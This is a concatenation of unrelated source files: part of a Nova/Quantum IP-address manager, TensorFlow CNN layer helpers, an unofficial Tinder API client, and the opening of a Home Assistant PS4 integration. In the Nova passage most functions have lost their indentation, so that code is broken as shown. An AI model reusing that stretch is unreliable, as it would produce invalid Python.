        are needed by Quantum but not the FlatManager.

        Raises when create_networks does not yield exactly one network.
        """
        admin_context = context.elevated()
        # Number of addresses in the v4 CIDR; FlatManager carves the
        # block into this many fixed IPs.
        subnet_size = len(netaddr.IPNetwork(cidr))
        # Positional args follow FlatManager.create_networks' signature;
        # the quantum_net_id is stored as the network uuid.
        networks = manager.FlatManager.create_networks(self.net_manager,
                      admin_context, label, cidr,
                      False, 1, subnet_size, cidr_v6, gateway,
                      gateway_v6, quantum_net_id, None, dns1, dns2,
                      ipam=True)
        #TODO(tr3buchet): refactor passing in the ipam key so that
        # it's no longer required. The reason it exists now is because
        # nova insists on carving up IP blocks. What ends up happening is
        # we create a v4 and an identically sized v6 block. The reason
        # the quantum tests passed previosly is nothing prevented an
        # incorrect v6 address from being assigned to the wrong subnet
        if len(networks) != 1:
            raise Exception(_("Error creating network entry"))
        network = networks[0]
        # Attach the Quantum-specific attributes to the Nova network row.
        net = {"project_id": tenant_id,
               "priority": priority,
               "uuid": quantum_net_id}
        db.network_update(admin_context, network['id'], net)
def delete_subnets_by_net_id(self, context, net_id, project_id):
"""Deletes a network based on Quantum UUID. Uses FlatManager
delete_network to avoid duplication.
"""
admin_context = context.elevated()
network = db.network_get_by_uuid(admin_context, net_id)
if not network:
raise Exception(_("No network with net_id = %s") % net_id)
manager.FlatManager.delete_network(self.net_manager,
admin_context, None,
network['uuid'],
require_disassociated=False)
def get_global_networks(self, admin_context):
return db.project_get_networks(admin_context, None, False)
def get_project_networks(self, admin_context):
try:
nets = db.network_get_all(admin_context.elevated())
except exception.NoNetworksFound:
return []
# only return networks with a project_id set
return [net for net in nets if net['project_id']]
def get_project_and_global_net_ids(self, context, project_id):
"""Fetches all networks associated with this project, or
that are "global" (i.e., have no project set).
Returns list sorted by 'priority'.
"""
admin_context = context.elevated()
networks = db.project_get_networks(admin_context, project_id, False)
networks.extend(self.get_global_networks(admin_context))
id_priority_map = {}
net_list = []
for n in networks:
net_id = n['uuid']
net_list.append((net_id, n["project_id"]))
id_priority_map[net_id] = n['priority']
return sorted(net_list, key=lambda x: id_priority_map[x[0]])
def allocate_fixed_ips(self, context, tenant_id, quantum_net_id,
network_tenant_id, vif_rec):
"""Allocates a single fixed IPv4 address for a virtual interface."""
admin_context = context.elevated()
network = db.network_get_by_uuid(admin_context, quantum_net_id)
address = None
if network['cidr']:
address = db.fixed_ip_associate_pool(admin_context,
network['id'],
vif_rec['instance_id'])
values = {'allocated': True,
'virtual_interface_id': vif_rec['id']}
db.fixed_ip_update(admin_context, address, values)
return [address]
def get_tenant_id_by_net_id(self, context, net_id, vif_id, project_id):
"""Returns tenant_id for this network. This is only necessary
in the melange IPAM case.
"""
return project_id
def get_subnets_by_net_id(self, context, tenant_id, net_id, _vif_id=None):
"""Returns information about the IPv4 and IPv6 subnets
associated with a Quantum Network UUID.
"""
n = db.network_get_by_uuid(context.elevated(), net_id)
subnet_v4 = {
'network_id': n['uuid'],
'cidr': n['cidr'],
'gateway': n['gateway'],
'broadcast': n['broadcast'],
'netmask': n['netmask'],
'version': 4,
'dns1': n['dns1'],
'dns2': n['dns2']}
#TODO(tr3buchet): I'm noticing we've assumed here that all dns is v4.
# this is probably bad as there is no way to add v6
# dns to nova
subnet_v6 = {
'network_id': n['uuid'],
'cidr': n['cidr_v6'],
'gateway': n['gateway_v6'],
'broadcast': None,
'netmask': n['netmask_v6'],
'version': 6,
'dns1': None,
'dns2': None}
return [subnet_v4, subnet_v6]
def get_routes_by_ip_block(self, context, block_id, project_id):
"""Returns the list of routes for the IP block"""
return []
def get_v4_ips_by_interface(self, context, net_id, vif_id, project_id):
"""Returns a list of IPv4 address strings associated with
the specified virtual interface, based on the fixed_ips table.
"""
# TODO(tr3buchet): link fixed_ips to vif by uuid so only 1 db call
vif_rec = db.virtual_interface_get_by_uuid(context, vif_id)
fixed_ips = db.fixed_ips_by_virtual_interface(context,
vif_rec['id'])
return [fixed_ip['address'] for fixed_ip in fixed_ips]
def get_v6_ips_by_interface(self, context, net_id, vif_id, project_id):
"""Returns a list containing a single IPv6 address strings
associated with the specified virtual interface.
"""
admin_context = context.elevated()
network = db.network_get_by_uuid(admin_context, net_id)
vif_rec = db.virtual_interface_get_by_uuid(context, vif_id)
if network['cidr_v6']:
ip = ipv6.to_global(network['cidr_v6'],
vif_rec['address'],
project_id)
return [ip]
return []
def verify_subnet_exists(self, context, tenant_id, quantum_net_id):
"""Confirms that a subnet exists that is associated with the
specified Quantum Network UUID. Raises an exception if no
such subnet exists.
"""
admin_context = context.elevated()
net = db.network_get_by_uuid(admin_context, quantum_net_id)
return net is not None
def deallocate_ips_by_vif(self, context, tenant_id, net_id, vif_ref):
"""Deallocate all fixed IPs associated with the specified
virtual interface.
"""
admin_context = context.elevated()
fixed_ips = db.fixed_ips_by_virtual_interface(admin_context,
vif_ref['id'])
# NOTE(s0mik): Sets fixed-ip to deallocated, but leaves the entry
# associated with the instance-id. This prevents us from handing it
# out again immediately, as allocating it to a new instance before
# a DHCP lease has timed-out is bad. Instead, the fixed-ip will
# be disassociated with the instance-id by a call to one of two
# methods inherited from FlatManager:
# - if DHCP is in use, a lease expiring in dnsmasq triggers
# a call to release_fixed_ip in the network manager.
# - otherwise, _disassociate_stale_fixed_ips is called periodically
# to disassociate all fixed ips that are unallocated
# but still associated with an instance-id.
for fixed_ip in fixed_ips:
db.fixed_ip_update(admin_context, fixed_ip['address'],
{'allocated': False,
'virtual_interface_id': None})
if len(fixed_ips) == 0:
LOG.error(_('No fixed IPs to deallocate for vif %s'),
vif_ref['id'])
def get_allocated_ips(self, context, subnet_id, project_id):
"""Returns a list of (ip, vif_id) pairs"""
admin_context = context.elevated()
ips = db.fixed_ip_get_all(admin_context)
allocated_ips = []
# Get all allocated IPs that are part of this subnet
network = db.network_get_by_uuid(admin_context, subnet_id)
for ip in ips:
# Skip unallocated IPs
if not ip['allocated'] == 1:
continue
if ip['network_id'] == network['id']:
vif = db.virtual_interface_get(admin_context,
ip['virtual_interface_id'])
allocated_ips.append((ip['address'], vif['uuid']))
return allocated_ips
def get_floating_ips_by_fixed_address(self, context, fixed_address):
return db.floating_ip_get_by_fixed_address(context, fixed_address)
|
|
# -*- coding:utf8 -*-
# File : cnn.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 12/30/16
#
# This file is part of TensorArtist.
from ._defaults import __default_dtype__, __default_nonlin__
from .helper import as_varnode, get_4dshape, get_2dshape, wrap_varnode_func, wrap_force_named_op, StaticDynamicDim
from .helper import lazy_O as O
from ..graph.env import Env, get_default_env
import tensorflow as tf
import functools
__all__ = ['conv2d', 'pooling2d', 'max_pooling2d', 'avg_pooling2d', 'fc', 'ntn', 'dropout', 'batch_norm', 'deconv2d']
@wrap_force_named_op
def conv2d(name, inpvar, nr_output_channels, kernel, stride=1, padding='SAME',
           use_bias=True, bias_is_shared_in_channel=True,
           nonlin=__default_nonlin__,
           W=None, b=None, param_dtype=__default_dtype__):
    """2-D convolution layer (channels-last: the channel count is read from
    static_shape[3], the tf.nn.conv2d default layout).

    :param kernel: int or (kh, kw) pair.
    :param stride: int or tuple, expanded to a 4-d stride spec.
    :param bias_is_shared_in_channel: one bias per output channel if True;
        otherwise a full (h, w, c) bias (requires static spatial dims).
    :param W, b: value or initializer; None selects Xavier / zeros.
    """
    inpvar = as_varnode(inpvar)
    kernel = get_2dshape(kernel)
    stride = get_4dshape(stride)
    assert inpvar.ndims == 4
    assert padding in ('VALID', 'SAME')
    assert inpvar.static_shape[3] is not None
    cin, cout = inpvar.static_shape[3], nr_output_channels
    # Filter layout is (kh, kw, cin, cout), as tf.nn.conv2d expects.
    W_shape = kernel + (cin, cout)
    if W is None:
        W = tf.contrib.layers.xavier_initializer_conv2d()
    W = O.ensure_variable('W', W, shape=W_shape, dtype=param_dtype)
    if use_bias:
        if bias_is_shared_in_channel:
            b_shape = (cout, )
        else:
            assert inpvar.static_shape[1] is not None and inpvar.static_shape[2] is not None
            b_shape = inpvar.static_shape[1:3] + (cout, )
        if b is None:
            b = tf.constant_initializer()
        b = O.ensure_variable('b', b, shape=b_shape, dtype=param_dtype)
    # conv -> (bias) -> nonlinearity, each op named for graph inspection.
    _ = inpvar
    _ = tf.nn.conv2d(_, W, strides=stride, padding=padding, name='conv')
    if use_bias:
        _ = tf.nn.bias_add(_, b, name='bias')
    _ = nonlin(_, name='nonlin')
    return tf.identity(_, name='out')
@wrap_force_named_op
def pooling2d(name, inpvar, kernel, stride=None, padding='VALID', method='MAX'):
    """2-D spatial pooling over a rank-4 tensor.

    :param kernel: pooling window, expanded to a 4-d ksize spec.
    :param stride: pooling stride; defaults to the kernel when None.
    :param method: 'MAX' or 'AVG'.
    """
    inpvar = as_varnode(inpvar)
    ksize = get_4dshape(kernel)
    strides = get_4dshape(stride, ksize)
    assert inpvar.ndims == 4
    if method == 'MAX':
        pool_fn = tf.nn.max_pool
    else:
        assert method == 'AVG'
        pool_fn = tf.nn.avg_pool
    return pool_fn(inpvar, ksize=ksize, strides=strides, padding=padding, name='out')
# Convenience aliases: pooling2d specialized by method.
max_pooling2d = functools.partial(pooling2d, method='MAX')
avg_pooling2d = functools.partial(pooling2d, method='AVG')
@wrap_force_named_op
def fc(name, inpvar, nr_output_channels,
       use_bias=True, nonlin=__default_nonlin__,
       W=None, b=None, param_dtype=__default_dtype__):
    """Fully-connected layer: flattens the input to 2-D, applies an affine
    transform and a nonlinearity.

    :param W, b: value or initializer; None selects Xavier / zeros.
    """
    inpvar = O.flatten2(inpvar)
    nr_inputs = inpvar.static_shape[1]
    assert nr_inputs is not None
    if W is None:
        W = tf.contrib.layers.xavier_initializer()
    W = O.ensure_variable('W', W, shape=(nr_inputs, nr_output_channels),
                          dtype=param_dtype)
    if use_bias:
        if b is None:
            b = tf.constant_initializer()
        b = O.ensure_variable('b', b, shape=(nr_output_channels, ),
                              dtype=param_dtype)
        out = tf.nn.xw_plus_b(inpvar, W, b, name='xwpb')
    else:
        out = tf.matmul(inpvar, W, name='matmul')
    out = nonlin(out, name='nonlin')
    return tf.identity(out, name='out')
@wrap_force_named_op
def ntn(name, lhs, rhs, nr_output_channels,
        use_bias=True, nonlin=__default_nonlin__,
        W=None, b=None, param_dtype=__default_dtype__):
    """Neural-tensor layer: bilinear form out[i, b] = lhs[i] . W[:, b, :] . rhs[i]
    (see the einsum below), plus optional bias and nonlinearity."""
    lhs, rhs = map(O.flatten2, [lhs, rhs])
    assert lhs.static_shape[1] is not None and rhs.static_shape[1] is not None
    W_shape = (lhs.static_shape[1], nr_output_channels, rhs.static_shape[1])
    b_shape = (nr_output_channels, )
    if W is None:
        W = tf.contrib.layers.xavier_initializer()
    W = O.ensure_variable('W', W, shape=W_shape, dtype=param_dtype)
    if use_bias:
        if b is None:
            b = tf.constant_initializer()
        b = O.ensure_variable('b', b, shape=b_shape, dtype=param_dtype)
    # Bilinear contraction over both feature axes of W.
    out = tf.einsum('ia,abc,ic->ib', lhs.tft, W.tft, rhs.tft)
    if use_bias:
        # add_axis(0) broadcasts the per-channel bias over the batch.
        out = tf.identity(out + b.add_axis(0), name='bias')
    out = nonlin(out, name='nonlin')
    return tf.identity(out, name='out')
@wrap_force_named_op
def dropout(name, inpvar, keep_prob, keep_prob_sym=None, noise_shape=None, seed=None):
    """Dropout layer, gated per-op by the env flag `compute_enable_dropout`.

    NOTE(review): when dropout is enabled, `keep_prob_sym` is overwritten
    with `keep_prob`, so a caller-supplied symbolic keep probability is
    effectively ignored — confirm this is intended.
    """
    env = get_default_env()
    if env.flags.compute_enable_dropout(name):
        keep_prob_sym = keep_prob
        out = tf.nn.dropout(inpvar, keep_prob_sym, noise_shape=noise_shape, seed=seed, name='dropout')
    else:
        # Dropout disabled (e.g. inference): identity pass-through.
        out = inpvar
    return tf.identity(out, name='out')
@wrap_force_named_op
def batch_norm(name, inpvar, decay=0.9, epsilon=1e-5, use_affine=True, param_dtype=__default_dtype__):
    """
    Batch normalization.
    :param name: operator name
    :param inpvar: input tensor, of data type NHWC
    :param decay: decay for moving average
    :param epsilon: epsilon
    :param use_affine: add affine transformation after the normalization (to preserve the bias and scale)
    :param param_dtype: param dtype
    :return: output tensor
    """
    from tensorflow.python.training import moving_averages
    assign_moving_average = moving_averages.assign_moving_average

    inpvar = as_varnode(inpvar)
    shape = inpvar.static_shape
    assert len(shape) in [2, 4]
    nr_channels = shape[-1]
    # 2-D inputs are treated as NHWC with 1x1 spatial extent so that
    # fused_batch_norm (which requires rank 4) can be used.
    if len(shape) == 2:
        inpvar = inpvar.reshape(-1, 1, 1, nr_channels)
    if use_affine:
        beta = O.variable('beta', tf.constant_initializer(), shape=[nr_channels], dtype=param_dtype)
        gamma = O.variable('gamma', tf.constant_initializer(1.0), shape=[nr_channels], dtype=param_dtype)
    else:
        # Fixed identity affine: shift 0, scale 1.
        beta = O.zeros([nr_channels], name='beta')
        gamma = O.ones([nr_channels], name='gamma')
    # Population statistics, updated via exponential moving average.
    moving_mean = O.variable('mean/ema', tf.constant_initializer(), shape=[nr_channels], trainable=False)
    moving_var = O.variable('variance/ema', tf.constant_initializer(1.0), shape=[nr_channels], trainable=False)
    env = get_default_env()
    if env.flags.compute_update_batch_normalization(name):
        # Training path: normalize with batch statistics.
        xn, batch_mean, batch_var = tf.nn.fused_batch_norm(inpvar, gamma, beta, epsilon=epsilon, is_training=True, name='bn')
    else:
        # Inference path: normalize with the moving averages.
        xn = tf.nn.batch_normalization(inpvar, moving_mean, moving_var, beta, gamma, variance_epsilon=epsilon, name='bn')
    if len(shape) == 2:
        xn = O.remove_axis(xn, [1, 2])
    # Only the master device updates the EMAs (avoids duplicate updates
    # under data-parallel control — see has_current_dpc/is_master_device).
    if env.flags.compute_update_batch_normalization(name) and \
            (not env.has_current_dpc() or env.current_dpc.is_master_device):
        update_mean_op = assign_moving_average(moving_mean.impl, batch_mean, decay, zero_debias=False, name='mean_ema_op')
        update_var_op = assign_moving_average(moving_var.impl, batch_var, decay, zero_debias=False, name='var_ema_op')
        with tf.control_dependencies([update_mean_op, update_var_op]):
            return tf.identity(xn, name='out')
    else:
        return tf.identity(xn, name='out')
@wrap_force_named_op
def deconv2d(name, inpvar, nr_output_channels, kernel, stride=1, padding='SAME', out_shape=None,
             use_bias=True, bias_is_shared_in_channel=True,
             nonlin=__default_nonlin__,
             W=None, b=None, param_dtype=__default_dtype__):
    """Transposed 2-D convolution (NHWC).

    :param out_shape: explicit (h, w) output size; when None the output
        spatial size is the input size multiplied by the stride.
    :param bias_is_shared_in_channel: one bias per output channel if True;
        otherwise a full (h, w, c) bias (requires static spatial dims).
    """
    inpvar = as_varnode(inpvar)
    in_shape = inpvar.static_shape
    nr_input_channels = in_shape[3]
    assert nr_input_channels is not None
    kernel = get_2dshape(kernel)
    stride2 = get_2dshape(stride)
    stride4 = get_4dshape(stride)
    if out_shape is None:
        # Derive both a static shape (for shape inference) and a dynamic
        # one (for the runtime op) by scaling the input dims by the stride.
        sd_h = StaticDynamicDim(in_shape[1], inpvar.shape[1]) * stride2[0]
        sd_w = StaticDynamicDim(in_shape[2], inpvar.shape[2]) * stride2[1]
        out_shape_static = [in_shape[0], sd_h.static, sd_w.static, nr_output_channels]
        out_shape_dynamic = O.canonize_sym_shape([inpvar.shape[0], sd_h.dynamic, sd_w.dynamic, nr_output_channels])
    else:
        out_shape = get_2dshape(out_shape)
        out_shape_static = [in_shape[0], out_shape[0], out_shape[1], nr_output_channels]
        out_shape_dynamic = O.canonize_sym_shape([inpvar.shape[0], out_shape[0], out_shape[1], nr_output_channels])
    # Note the transposed filter layout: (kh, kw, cout, cin).
    W_shape = kernel + (nr_output_channels, nr_input_channels)
    if W is None:
        W = tf.contrib.layers.xavier_initializer_conv2d()
    W = O.ensure_variable('W', W, shape=W_shape, dtype=param_dtype)
    if use_bias:
        if bias_is_shared_in_channel:
            b_shape = (nr_output_channels, )
        else:
            assert in_shape[1] is not None and in_shape[2] is not None
            b_shape = in_shape[1:3] + (nr_output_channels, )
        if b is None:
            b = tf.constant_initializer()
        b = O.ensure_variable('b', b, shape=b_shape, dtype=param_dtype)
    _ = inpvar
    _ = tf.nn.conv2d_transpose(_, W, out_shape_dynamic, stride4, padding=padding, data_format='NHWC', name='conv')
    # conv2d_transpose loses static shape info; restore it explicitly.
    _.set_shape(tf.TensorShape(out_shape_static))
    if use_bias:
        _ = tf.nn.bias_add(_, b, name='bias')
    _ = nonlin(_, name='nonlin')
    return tf.identity(_, name='out')
|
|
# coding=utf-8
import json
import config
import requests
# Base headers for GET requests (no body, so no content-type).
get_headers = {
    'app_version': '6.9.4',
    'platform': 'ios',
    "User-agent": "Tinder/7.5.3 (iPhone; iOS 10.3.2; Scale/2.00)",
    "Accept": "application/json"
}

# Headers for requests that carry a JSON body; both dicts later receive
# the X-Auth-Token entry in get_auth_token().
headers = get_headers.copy()
headers['content-type'] = "application/json"
def get_auth_token(fb_auth_token, fb_user_id):
    """Exchange a Facebook token/user id for a Tinder API token.

    On success returns the token string and installs it as X-Auth-Token
    on both module-level header dicts; on failure returns an error dict.
    """
    if "error" in fb_auth_token:
        return {"error": "could not retrieve fb_auth_token"}
    if "error" in fb_user_id:
        return {"error": "could not retrieve fb_user_id"}
    url = config.host + '/v2/auth/login/facebook'
    req = requests.post(url,
                        headers=headers,
                        data=json.dumps(
                            {'token': fb_auth_token, 'facebook_id': fb_user_id})
                        )
    try:
        tinder_auth_token = req.json()["data"]["api_token"]
        # Side effect: all later calls in this module are authenticated.
        headers.update({"X-Auth-Token": tinder_auth_token})
        get_headers.update({"X-Auth-Token": tinder_auth_token})
        print("You have been successfully authorized!")
        return tinder_auth_token
    except Exception as e:
        print(e)
        return {"error": "Something went wrong. Sorry, but we could not authorize you."}
def authverif():
    """Authorize against Tinder; return True on success, False on failure."""
    result = get_auth_token(config.fb_access_token, config.fb_user_id)
    # get_auth_token returns an {"error": ...} dict on failure and a token
    # string on success, so membership of "error" distinguishes the two.
    return "error" not in result
def get_recommendations():
    '''
    Returns a list of users that you can swipe on
    '''
    try:
        r = requests.get('https://api.gotinder.com/user/recs', headers=headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        # Best-effort: log and implicitly return None on network failure.
        print("Something went wrong with getting recomendations:", e)
def get_updates(last_activity_date=""):
    '''
    Returns all updates since the given activity date.
    The last activity date is defaulted at the beginning of time.
    Format for last_activity_date: "2017-07-09T10:28:13.392Z"
    '''
    try:
        url = config.host + '/updates'
        r = requests.post(url,
                          headers=headers,
                          data=json.dumps({"last_activity_date": last_activity_date}))
        return r.json()
    except requests.exceptions.RequestException as e:
        # Best-effort: log and implicitly return None on network failure.
        print("Something went wrong with getting updates:", e)
def get_self():
    '''
    Returns your own profile data
    '''
    try:
        url = config.host + '/profile'
        r = requests.get(url, headers=headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        # Best-effort: log and implicitly return None on network failure.
        print("Something went wrong. Could not get your data:", e)
def change_preferences(**kwargs):
    '''
    ex: change_preferences(age_filter_min=30, gender=0)
    kwargs: a dictionary - whose keys become separate keyword arguments and the values become values of these arguments
    age_filter_min: 18..46
    age_filter_max: 22..55
    age_filter_min <= age_filter_max - 4
    gender: 0 == seeking males, 1 == seeking females
    distance_filter: 1..100
    discoverable: true | false
    {"photo_optimizer_enabled":false}
    '''
    try:
        url = config.host + '/profile'
        # The kwargs dict is sent verbatim as the JSON request body.
        r = requests.post(url, headers=headers, data=json.dumps(kwargs))
        return r.json()
    except requests.exceptions.RequestException as e:
        print("Something went wrong. Could not change your preferences:", e)
def get_meta():
    '''
    Returns meta data on yourself. Including the following keys:
    ['globals', 'client_resources', 'versions', 'purchases',
    'status', 'groups', 'products', 'rating', 'tutorials',
    'travel', 'notifications', 'user']
    '''
    try:
        url = config.host + '/meta'
        r = requests.get(url, headers=headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        # Best-effort: log and implicitly return None on network failure.
        print("Something went wrong. Could not get your metadata:", e)
def get_meta_v2():
    '''
    Returns meta data on yourself from V2 API. Including the following keys:
    ['account', 'client_resources', 'plus_screen', 'boost',
    'fast_match', 'top_picks', 'paywall', 'merchandising', 'places',
    'typing_indicator', 'profile', 'recs']
    '''
    try:
        url = config.host + '/v2/meta'
        r = requests.get(url, headers=headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        # Best-effort: log and implicitly return None on network failure.
        print("Something went wrong. Could not get your metadata:", e)
def update_location(lat, lon):
    '''
    Updates your location to the given float inputs
    Note: Requires a passport / Tinder Plus
    '''
    try:
        url = config.host + '/passport/user/travel'
        r = requests.post(url, headers=headers, data=json.dumps({"lat": lat, "lon": lon}))
        return r.json()
    except requests.exceptions.RequestException as e:
        # Best-effort: log and implicitly return None on network failure.
        print("Something went wrong. Could not update your location:", e)
def reset_real_location():
    '''
    Resets a passport-set location back to your real location.
    '''
    try:
        url = config.host + '/passport/user/reset'
        r = requests.post(url, headers=headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        # Fixed copy-pasted message: this endpoint resets, not updates.
        print("Something went wrong. Could not reset your location:", e)
def get_recs_v2():
    '''
    Returns recommendations from the v2 API. Works more consistently than
    get_recommendations because it seems to respect an updated location.
    '''
    try:
        url = config.host + '/v2/recs/core?locale=en-US'
        r = requests.get(url, headers=headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        # Match the error handling of the sibling endpoints: catch only
        # request failures and report the actual exception instead of the
        # former bare `print('excepted')` under a blanket Exception.
        print("Something went wrong. Could not get your recommendations:", e)
def set_webprofileusername(username):
    '''
    Sets the username for the webprofile: https://www.gotinder.com/@YOURUSERNAME
    '''
    try:
        url = config.host + '/profile/username'
        r = requests.put(url, headers=headers,
                         data=json.dumps({"username": username}))
        return r.json()
    except requests.exceptions.RequestException as e:
        # Best-effort: log and implicitly return None on network failure.
        print("Something went wrong. Could not set webprofile username:", e)
def reset_webprofileusername(username):
    '''
    Resets the username for the webprofile

    NOTE(review): the `username` parameter is unused (DELETE takes no body);
    it is kept to avoid breaking existing callers.
    '''
    try:
        url = config.host + '/profile/username'
        r = requests.delete(url, headers=headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        print("Something went wrong. Could not delete webprofile username:", e)
def get_person(id):
    '''
    Gets a user's profile via their id

    NOTE(review): the parameter shadows the builtin `id`; renaming it would
    break keyword callers, so it is left as-is.
    '''
    try:
        url = config.host + '/user/%s' % id
        r = requests.get(url, headers=headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        print("Something went wrong. Could not get that person:", e)
def send_msg(match_id, msg):
    '''
    Sends the text `msg` to the match identified by `match_id`.
    '''
    try:
        url = config.host + '/user/matches/%s' % match_id
        r = requests.post(url, headers=headers,
                          data=json.dumps({"message": msg}))
        return r.json()
    except requests.exceptions.RequestException as e:
        # Best-effort: log and implicitly return None on network failure.
        print("Something went wrong. Could not send your message:", e)
def unmatch(match_id):
    '''
    Unmatches (deletes) the match identified by `match_id`.
    '''
    try:
        url = config.host + '/user/matches/%s' % match_id
        r = requests.delete(url, headers=headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        print("Something went wrong. Could not unmatch person:", e)
def superlike(person_id):
    '''
    Super-likes the user identified by `person_id`.
    '''
    try:
        url = config.host + '/like/%s/super' % person_id
        r = requests.post(url, headers=headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        print("Something went wrong. Could not superlike:", e)
def like(person_id):
    '''
    Likes (swipes right on) the user identified by `person_id`.
    '''
    try:
        url = config.host + '/like/%s' % person_id
        # GET request with no body, hence the body-less get_headers.
        r = requests.get(url, headers=get_headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        print("Something went wrong. Could not like:", e)
def dislike(person_id):
    '''
    Passes on (swipes left on) the user identified by `person_id`.
    '''
    try:
        url = config.host + '/pass/%s' % person_id
        # GET request with no body, hence the body-less get_headers.
        r = requests.get(url, headers=get_headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        print("Something went wrong. Could not dislike:", e)
def report(person_id, cause, explanation=''):
    '''
    Reports the user identified by `person_id`.
    There are three options for cause:
        0 : Other and requires an explanation
        1 : Feels like spam and no explanation
        4 : Inappropriate Photos and no explanation
    '''
    try:
        url = config.host + '/report/%s' % person_id
        # Serialize the body as JSON: the shared `headers` declare
        # 'content-type: application/json', but the previous code passed a
        # plain dict, which requests sends form-encoded — contradicting the
        # header (every other POST in this module uses json.dumps).
        r = requests.post(url, headers=headers, data=json.dumps({
            "cause": cause, "text": explanation}))
        return r.json()
    except requests.exceptions.RequestException as e:
        print("Something went wrong. Could not report:", e)
def match_info(match_id):
    '''
    Returns details for a single match identified by `match_id`.
    '''
    try:
        url = config.host + '/matches/%s' % match_id
        r = requests.get(url, headers=headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        print("Something went wrong. Could not get your match info:", e)
def all_matches():
    '''
    Returns all of your matches from the v2 API.
    '''
    try:
        url = config.host + '/v2/matches'
        r = requests.get(url, headers=headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        print("Something went wrong. Could not get your match info:", e)
def fast_match_info():
    '''
    Returns the number of people waiting in your fast-match queue
    (read from the response headers, not the body).
    '''
    try:
        url = config.host + '/v2/fast-match/preview'
        r = requests.get(url, headers=headers)
        count = r.headers['fast-match-count']
        # image is in the response but its in hex..
        return count
    except requests.exceptions.RequestException as e:
        print("Something went wrong. Could not get your fast-match count:", e)
def trending_gifs(limit=3):
    '''
    Returns up to `limit` trending Giphy gifs for use in messages.
    '''
    try:
        url = config.host + '/giphy/trending?limit=%s' % limit
        r = requests.get(url, headers=headers)
        return r.json()
    except requests.exceptions.RequestException as e:
        print("Something went wrong. Could not get the trending gifs:", e)
def gif_query(query, limit=3):
    '''
    Searches Giphy for up to `limit` gifs matching `query`.
    '''
    try:
        url = config.host + '/giphy/search'
        # Let requests build the query string so `query` is URL-encoded;
        # raw %-interpolation broke on spaces and special characters.
        r = requests.get(url, headers=headers,
                         params={"limit": limit, "query": query})
        return r.json()
    except requests.exceptions.RequestException as e:
        print("Something went wrong. Could not get your gifs:", e)
# def see_friends():
# try:
# url = config.host + '/group/friends'
# r = requests.get(url, headers=headers)
# return r.json()['results']
# except requests.exceptions.RequestException as e:
# print("Something went wrong. Could not get your Facebook friends:", e)
|
|
"""Support for PlayStation 4 consoles."""
import logging
import os
from pyps4_2ndscreen.ddp import async_create_ddp_endpoint
from pyps4_2ndscreen.media_art import COUNTRIES
import voluptuous as vol
from homeassistant.components.media_player.const import (
ATTR_MEDIA_CONTENT_TYPE,
ATTR_MEDIA_TITLE,
MEDIA_TYPE_GAME,
)
from homeassistant.const import (
ATTR_COMMAND,
ATTR_ENTITY_ID,
ATTR_LOCKED,
CONF_REGION,
CONF_TOKEN,
)
from homeassistant.core import HomeAssistant, split_entity_id
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_validation as cv, entity_registry
from homeassistant.util import location
from homeassistant.util.json import load_json, save_json
from .config_flow import PlayStation4FlowHandler # noqa: F401
from .const import (
ATTR_MEDIA_IMAGE_URL,
COMMANDS,
COUNTRYCODE_NAMES,
DOMAIN,
GAMES_FILE,
PS4_DATA,
)
_LOGGER = logging.getLogger(__name__)

SERVICE_COMMAND = "send_command"

# Schema for the send_command service: one or more entity ids plus a
# command name drawn from the known COMMANDS set.
PS4_COMMAND_SCHEMA = vol.Schema(
    {
        vol.Required(ATTR_ENTITY_ID): cv.entity_ids,
        vol.Required(ATTR_COMMAND): vol.In(list(COMMANDS)),
    }
)

PLATFORMS = ["media_player"]
class PS4Data:
    """Init Data Class."""

    def __init__(self):
        """Init Class."""
        # Registered PS4 device entities (appended by the media_player
        # platform; consumed by the send_command service).
        self.devices = []
        # Shared DDP protocol instance, set in async_setup.
        self.protocol = None
async def async_setup(hass, config):
    """Set up the PS4 Component."""
    hass.data[PS4_DATA] = PS4Data()
    # One shared DDP (device discovery protocol) endpoint for all consoles.
    transport, protocol = await async_create_ddp_endpoint()
    hass.data[PS4_DATA].protocol = protocol
    _LOGGER.debug("PS4 DDP endpoint created: %s, %s", transport, protocol)
    service_handle(hass)
    return True
async def async_setup_entry(hass, entry):
    """Set up PS4 from a config entry."""
    hass.config_entries.async_setup_platforms(entry, PLATFORMS)
    return True
async def async_unload_entry(hass, entry):
    """Unload a PS4 config entry."""
    return await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
async def async_migrate_entry(hass, entry):
    """Migrate old entry."""
    config_entries = hass.config_entries
    data = entry.data
    version = entry.version

    _LOGGER.debug("Migrating PS4 entry from Version %s", version)

    # User-facing explanation, used only if migration cannot complete.
    reason = {
        1: "Region codes have changed",
        2: "Format for Unique ID for entity registry has changed",
    }

    # Migrate Version 1 -> Version 2: New region codes.
    if version == 1:
        # Geo-IP lookup to pick a region; only succeeds if the detected
        # country is one supported by the media-art lookup.
        loc = await location.async_detect_location_info(
            hass.helpers.aiohttp_client.async_get_clientsession()
        )
        if loc:
            country = COUNTRYCODE_NAMES.get(loc.country_code)
            if country in COUNTRIES:
                for device in data["devices"]:
                    device[CONF_REGION] = country
                version = entry.version = 2
                config_entries.async_update_entry(entry, data=data)
                _LOGGER.info(
                    "PlayStation 4 Config Updated: \
                    Region changed to: %s",
                    country,
                )

    # Migrate Version 2 -> Version 3: Update identifier format.
    if version == 2:
        # Prevent changing entity_id. Updates entity registry.
        registry = await entity_registry.async_get_registry(hass)

        for entity_id, e_entry in registry.entities.items():
            if e_entry.config_entry_id == entry.entry_id:
                unique_id = e_entry.unique_id

                # Remove old entity entry.
                registry.async_remove(entity_id)

                # Format old unique_id.
                unique_id = format_unique_id(entry.data[CONF_TOKEN], unique_id)

                # Create new entry with old entity_id.
                new_id = split_entity_id(entity_id)[1]
                registry.async_get_or_create(
                    "media_player",
